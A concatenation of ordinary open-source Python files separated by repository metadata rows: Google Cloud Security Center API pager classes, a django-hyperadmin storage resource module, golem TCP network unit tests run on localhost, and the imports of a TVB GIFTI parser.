self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.GroupResult]:
for page in self.pages:
yield from page.group_by_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class GroupFindingsAsyncPager:
"""A pager for iterating through ``group_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``GroupFindings`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.GroupFindingsResponse]],
request: securitycenter_service.GroupFindingsRequest,
response: securitycenter_service.GroupFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.GroupFindingsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.GroupResult]:
async def async_generator():
async for page in self.pages:
for response in page.group_by_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListAssetsPager:
"""A pager for iterating through ``list_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse` object, and
provides an ``__iter__`` method to iterate through its
``list_assets_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListAssets`` requests and continue to iterate
through the ``list_assets_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListAssetsResponse],
request: securitycenter_service.ListAssetsRequest,
response: securitycenter_service.ListAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.ListAssetsResponse.ListAssetsResult]:
for page in self.pages:
yield from page.list_assets_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListAssetsAsyncPager:
"""A pager for iterating through ``list_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``list_assets_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListAssets`` requests and continue to iterate
through the ``list_assets_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListAssetsResponse]],
request: securitycenter_service.ListAssetsRequest,
response: securitycenter_service.ListAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.ListAssetsResponse.ListAssetsResult]:
async def async_generator():
async for page in self.pages:
for response in page.list_assets_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListFindingsPager:
"""A pager for iterating through ``list_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse` object, and
provides an ``__iter__`` method to iterate through its
``list_findings_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListFindings`` requests and continue to iterate
through the ``list_findings_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListFindingsResponse],
request: securitycenter_service.ListFindingsRequest,
response: securitycenter_service.ListFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListFindingsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.ListFindingsResponse.ListFindingsResult]:
for page in self.pages:
yield from page.list_findings_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListFindingsAsyncPager:
"""A pager for iterating through ``list_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``list_findings_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListFindings`` requests and continue to iterate
through the ``list_findings_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListFindingsResponse]],
request: securitycenter_service.ListFindingsRequest,
response: securitycenter_service.ListFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListFindingsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.ListFindingsResponse.ListFindingsResult]:
async def async_generator():
async for page in self.pages:
for response in page.list_findings_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListNotificationConfigsPager:
"""A pager for iterating through ``list_notification_configs`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse` object, and
provides an ``__iter__`` method to iterate through its
``notification_configs`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListNotificationConfigs`` requests and continue to iterate
through the ``notification_configs`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListNotificationConfigsResponse],
request: securitycenter_service.ListNotificationConfigsRequest,
response: securitycenter_service.ListNotificationConfigsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListNotificationConfigsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListNotificationConfigsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[notification_config.NotificationConfig]:
for page in self.pages:
yield from page.notification_configs
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListNotificationConfigsAsyncPager:
"""A pager for iterating through ``list_notification_configs`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``notification_configs`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListNotificationConfigs`` requests and continue to iterate
through the ``notification_configs`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListNotificationConfigsResponse]],
request: securitycenter_service.ListNotificationConfigsRequest,
response: securitycenter_service.ListNotificationConfigsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListNotificationConfigsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListNotificationConfigsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[notification_config.NotificationConfig]:
async def async_generator():
async for page in self.pages:
for response in page.notification_configs:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListSourcesPager:
"""A pager for iterating through ``list_sources`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse` object, and
provides an ``__iter__`` method to iterate through its
``sources`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListSources`` requests and continue to iterate
through the ``sources`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListSourcesResponse],
request: securitycenter_service.ListSourcesRequest,
response: securitycenter_service.ListSourcesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListSourcesRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListSourcesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListSourcesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[source.Source]:
for page in self.pages:
yield from page.sources
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListSourcesAsyncPager:
"""A pager for iterating through ``list_sources`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse` object, and
provides an ``__aiter__`` method to iterate through its
``sources`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListSources`` requests and continue to iterate
through the ``sources`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListSourcesResponse]],
request: securitycenter_service.ListSourcesRequest,
response: securitycenter_service.ListSourcesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListSourcesRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListSourcesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListSourcesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[source.Source]:
async def async_generator():
async for page in self.pages:
for response in page.sources:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
| apache-2.0 | -5,133,013,779,977,619,000 | 42.432181 | 105 | 0.660788 | false |
zbyte64/django-hyperadmin | hyperadmin/resources/storages/resources.py | 1 | 4161 | import os
from django.core.exceptions import ObjectDoesNotExist
from hyperadmin.links import Link
from hyperadmin.resources.crud import CRUDResource
from hyperadmin.resources.storages.forms import UploadForm, Base64UploadForm, UploadLinkForm
from hyperadmin.resources.storages.indexes import StorageIndex
from hyperadmin.resources.storages.endpoints import ListEndpoint, CreateUploadEndpoint, Base64UploadEndpoint, BoundFile
class StorageQuery(object):
def __init__(self, storage, path=''):
self.storage = storage
self.path = path
def filter(self, path):
if self.path:
path = os.path.join(self.path, path)
return StorageQuery(self.storage, path)
def get_dirs_and_files(self):
try:
dirs, files = self.storage.listdir(self.path)
except NotImplementedError:
return [], []
if self.path:
files = [os.path.join(self.path, filename) for filename in files]
return dirs, [BoundFile(self.storage, filename) for filename in files]
def get(self, path):
if self.path:
path = os.path.join(self.path, path)
if not self.storage.exists(path):
raise ObjectDoesNotExist
return BoundFile(self.storage, path)
class StorageResource(CRUDResource):
#resource_adaptor = storage object
form_class = UploadForm
upload_link_form_class = UploadLinkForm
base64_upload_form_class = Base64UploadForm
list_endpoint = (ListEndpoint, {})
create_upload_endpoint = (CreateUploadEndpoint, {})
base64_upload_endpoint = (Base64UploadEndpoint, {})
def __init__(self, **kwargs):
kwargs.setdefault('app_name', '-storages')
super(StorageResource, self).__init__(**kwargs)
def get_storage(self):
return self.resource_adaptor
storage = property(get_storage)
def get_base64_upload_form_class(self):
return self.base64_upload_form_class
def get_upload_link_form_class(self):
return self.upload_link_form_class
def get_view_endpoints(self):
endpoints = super(StorageResource, self).get_view_endpoints()
endpoints.insert(0, self.create_upload_endpoint)
return endpoints
def get_indexes(self):
return {'primary': StorageIndex('primary', self)}
def get_primary_query(self):
return StorageQuery(self.storage)
def get_instances(self):
'''
Returns a set of native objects for a given state
'''
if 'page' in self.state:
return self.state['page'].object_list
if self.state.has_view_class('change_form'):
return []
dirs, files = self.get_primary_query()
instances = [BoundFile(self.storage, file_name) for file_name in files]
return instances
def get_item_form_kwargs(self, item=None, **kwargs):
kwargs = super(StorageResource, self).get_item_form_kwargs(item, **kwargs)
kwargs['storage'] = self.storage
return kwargs
def get_form_kwargs(self, **kwargs):
kwargs = super(StorageResource, self).get_form_kwargs(**kwargs)
kwargs['storage'] = self.storage
return kwargs
def get_upload_link_form_kwargs(self, **kwargs):
kwargs = self.get_form_kwargs(**kwargs)
kwargs['resource'] = self
kwargs['request'] = self.api_request.request
return kwargs
def get_item_url(self, item):
return self.link_prototypes['update'].get_url(item=item)
def get_item_storage_link(self, item, **kwargs):
link_kwargs = {'url': item.instance.url,
'resource': self,
'prompt': 'Absolute Url',
'rel': 'storage-url', }
link_kwargs.update(kwargs)
storage_link = Link(**link_kwargs)
return storage_link
def get_item_outbound_links(self, item):
links = self.create_link_collection()
links.append(self.get_item_storage_link(item, link_factor='LO'))
return links
def get_item_prompt(self, item):
return item.instance.name
def get_paginator_kwargs(self):
return {}
| bsd-3-clause | -3,845,229,485,147,536,400 | 33.106557 | 119 | 0.641192 | false |
imapp-pl/golem | tests/golem/network/transport/test_network.py | 1 | 14603 | import logging
import os
import time
import unittest
from contextlib import contextmanager
from golem.core.databuffer import DataBuffer
from golem.network.transport.message import Message, MessageHello, init_messages
from golem.network.transport.network import ProtocolFactory, SessionFactory, SessionProtocol
from golem.network.transport.tcpnetwork import TCPNetwork, TCPListenInfo, TCPListeningInfo, TCPConnectInfo, \
SocketAddress, BasicProtocol, ServerProtocol, SafeProtocol
from golem.tools.testwithreactor import TestWithReactor
class ASession(object):
def __init__(self, conn):
self.conn = conn
self.dropped_called = False
self.msgs = []
def dropped(self):
self.dropped_called = True
def interpret(self, msg):
self.msgs.append(msg)
def sign(self, msg):
msg.sig = "ASessionSign"
return msg
def encrypt(self, msg):
return "ASessionEncrypt{}".format(msg)
def decrypt(self, msg):
if os.path.commonprefix([msg, "ASessionEncrypt"]) != "ASessionEncrypt":
return None
else:
return msg[len("ASessionEncrypt"):]
class AProtocol(object, SessionProtocol):
def __init__(self, server):
self.server = server
timeout = 20
@contextmanager
def async_scope(status, idx=0):
status[idx] = False
started = time.time()
yield
while not status[idx]:
if time.time() - started >= timeout:
raise RuntimeError('Operation timed out')
time.sleep(0.2)
def get_port():
min_port = 49200
max_port = 65535
test_port_range = 1000
base = int(time.time() * 10 ** 6) % (max_port - min_port - test_port_range)
return base + min_port
class TestNetwork(TestWithReactor):
reactor_thread = None
prev_reactor = None
timeout = 10
def setUp(self):
logging.basicConfig(level=logging.DEBUG)
self.listen_success = None
self.connect_success = None
self.stop_listening_success = None
self.port = None
self.kwargs_len = 0
session_factory = SessionFactory(ASession)
protocol_factory = ProtocolFactory(SafeProtocol, Server(), session_factory)
self.network = TCPNetwork(protocol_factory)
def test(self):
listen_status = [False]
conn_status = [False, False, False]
def _listen_success(*args, **kwargs):
self.__listen_success(*args, **kwargs)
listen_status[0] = True
def _listen_failure(**kwargs):
self.__listen_failure(**kwargs)
listen_status[0] = True
def _conn_success(idx):
def fn(*args, **kwargs):
self.__connection_success(*args, **kwargs)
conn_status[idx] = True
return fn
def _conn_failure(idx):
def fn(**kwargs):
self.__connection_failure(**kwargs)
conn_status[idx] = True
return fn
def _listen_stop_success(*args, **kwargs):
self.__stop_listening_success(*args, **kwargs)
listen_status[0] = True
def _listen_stop_failure(**kwargs):
self.__stop_listening_failure(**kwargs)
listen_status[0] = True
port = get_port()
# listen
listen_info = TCPListenInfo(port,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, port)
self.assertEquals(len(self.network.active_listeners), 1)
listen_info = TCPListenInfo(port,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, None)
self.assertEquals(len(self.network.active_listeners), 1)
listen_info = TCPListenInfo(port, port + 1000,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, port + 1)
self.assertEquals(len(self.network.active_listeners), 2)
with async_scope(listen_status):
self.network.listen(listen_info, a=1, b=2, c=3, d=4, e=5)
self.assertEquals(self.port, port + 2)
self.assertEquals(self.kwargs_len, 5)
self.assertEquals(len(self.network.active_listeners), 3)
# connect
address = SocketAddress('localhost', port)
connect_info = TCPConnectInfo([address], _conn_success(0), _conn_failure(0))
self.connect_success = None
with async_scope(conn_status, 0):
self.network.connect(connect_info)
self.assertTrue(self.connect_success)
address2 = SocketAddress('localhost', port + 1)
connect_info_2 = TCPConnectInfo([address2], _conn_success(1), _conn_failure(1))
self.connect_success = None
with async_scope(conn_status, 1):
self.network.connect(connect_info_2)
self.assertTrue(self.connect_success)
connect_info_3 = TCPConnectInfo([address, address2], _conn_success(2), _conn_failure(2))
self.connect_success = None
with async_scope(conn_status, 2):
self.network.connect(connect_info_3)
self.assertTrue(self.connect_success)
# stop listening
listening_info = TCPListeningInfo(port,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
d = self.network.stop_listening(listening_info)
self.assertTrue(d.called)
self.assertEquals(len(self.network.active_listeners), 2)
self.assertTrue(self.stop_listening_success)
listening_info = TCPListeningInfo(port,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 2)
self.assertFalse(self.stop_listening_success)
listening_info = TCPListeningInfo(port + 1,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 1)
self.assertTrue(self.stop_listening_success)
listening_info = TCPListeningInfo(port + 2,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 0)
self.assertTrue(self.stop_listening_success)
# listen on previously closed ports
listen_info = TCPListenInfo(port, port + 4,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, port)
self.assertEquals(len(self.network.active_listeners), 1)
listening_info = TCPListeningInfo(port,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 0)
def __listen_success(self, port, **kwargs):
self.listen_success = True
self.port = port
self.kwargs_len = len(kwargs)
def __listen_failure(self, **kwargs):
self.port = None
self.listen_success = False
def __connection_success(self, result, **kwargs):
self.connect_success = True
def __connection_failure(self, **kwargs):
self.connect_success = False
def __stop_listening_success(self, **kwargs):
self.stop_listening_success = True
def __stop_listening_failure(self, **kwargs):
self.stop_listening_success = False
class Server:
def __init__(self):
self.new_connection_called = 0
self.sessions = []
def new_connection(self, session):
self.new_connection_called += 1
self.sessions.append(session)
class Transport:
def __init__(self):
self.lose_connection_called = False
self.abort_connection_called = False
self.buff = []
def loseConnection(self):
self.lose_connection_called = True
def abortConnection(self):
self.abort_connection_called = True
def getHandle(self):
pass
def write(self, msg):
self.buff.append(msg)
class TestProtocols(unittest.TestCase):
def test_init(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
from twisted.internet.protocol import Protocol
self.assertTrue(isinstance(p, Protocol))
self.assertFalse(p.opened)
self.assertIsNotNone(p.db)
for p in prt[1:]:
self.assertIsNotNone(p.server)
def test_close(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
self.assertFalse(p.transport.lose_connection_called)
p.close()
self.assertTrue(p.transport.lose_connection_called)
def test_close_now(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
self.assertFalse(p.transport.abort_connection_called)
p.close_now()
self.assertFalse(p.opened)
self.assertTrue(p.transport.abort_connection_called)
def test_connection_made(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertFalse(p.opened)
p.connectionMade()
self.assertTrue(p.opened)
self.assertFalse(p.session.dropped_called)
p.connectionLost()
self.assertFalse(p.opened)
assert 'session' not in p.__dict__
def test_connection_lost(self):
prt = [BasicProtocol(), ServerProtocol(Server()), SafeProtocol(Server())]
for p in prt:
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertIsNone(p.session)
p.connectionLost()
self.assertFalse(p.opened)
p.connectionMade()
self.assertTrue(p.opened)
self.assertIsNotNone(p.session)
self.assertFalse(p.session.dropped_called)
p.connectionLost()
self.assertFalse(p.opened)
assert 'session' not in p.__dict__
class TestBasicProtocol(unittest.TestCase):
def test_send_and_receive_message(self):
init_messages()
p = BasicProtocol()
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertFalse(p.send_message("123"))
msg = MessageHello()
self.assertFalse(p.send_message(msg))
p.connectionMade()
self.assertTrue(p.send_message(msg))
self.assertEqual(len(p.transport.buff), 1)
p.dataReceived(p.transport.buff[0])
self.assertIsInstance(p.session.msgs[0], MessageHello)
self.assertEquals(msg.timestamp, p.session.msgs[0].timestamp)
time.sleep(1)
msg = MessageHello()
self.assertNotEquals(msg.timestamp, p.session.msgs[0].timestamp)
self.assertTrue(p.send_message(msg))
self.assertEqual(len(p.transport.buff), 2)
db = DataBuffer()
db.append_string(p.transport.buff[1])
m = Message.deserialize(db)[0]
self.assertEqual(m.timestamp, msg.timestamp)
p.connectionLost()
assert 'session' not in p.__dict__
class TestServerProtocol(unittest.TestCase):
def test_connection_made(self):
p = ServerProtocol(Server())
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
p.connectionMade()
self.assertEquals(len(p.server.sessions), 1)
p.connectionLost()
assert 'session' not in p.__dict__
class TestSaferProtocol(unittest.TestCase):
def test_send_and_receive_message(self):
p = SafeProtocol(Server())
p.transport = Transport()
session_factory = SessionFactory(ASession)
p.set_session_factory(session_factory)
self.assertFalse(p.send_message("123"))
msg = MessageHello()
self.assertEqual(msg.sig, "")
self.assertFalse(p.send_message(msg))
p.connectionMade()
self.assertTrue(p.send_message(msg))
self.assertEqual(len(p.transport.buff), 1)
p.dataReceived(p.transport.buff[0])
self.assertIsInstance(p.session.msgs[0], MessageHello)
self.assertEquals(msg.timestamp, p.session.msgs[0].timestamp)
self.assertEqual(msg.sig, "ASessionSign")
p.connectionLost()
assert 'session' not in p.__dict__
| gpl-3.0 | 2,515,513,238,718,722,600 | 34.14604 | 109 | 0.587345 | false |
rajul/tvb-framework | tvb/adapters/uploaders/gifti/parser.py | 1 | 9083 | # -*- coding: utf-8 -*-
#
#
# TheVirtualBrain-Framework Package. This package holds all Data Management, and
# Web-UI helpful to run brain-simulations. To use it, you also need do download
# TheVirtualBrain-Scientific Package (for simulators). See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
# The Virtual Brain: a simulator of primate brain network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
.. moduleauthor:: Mihai Andrei <[email protected]>
.. moduleauthor:: Calin Pavel <[email protected]>
"""
import os
import numpy as np
from nibabel.gifti import giftiio
from nibabel.nifti1 import intent_codes, data_type_codes
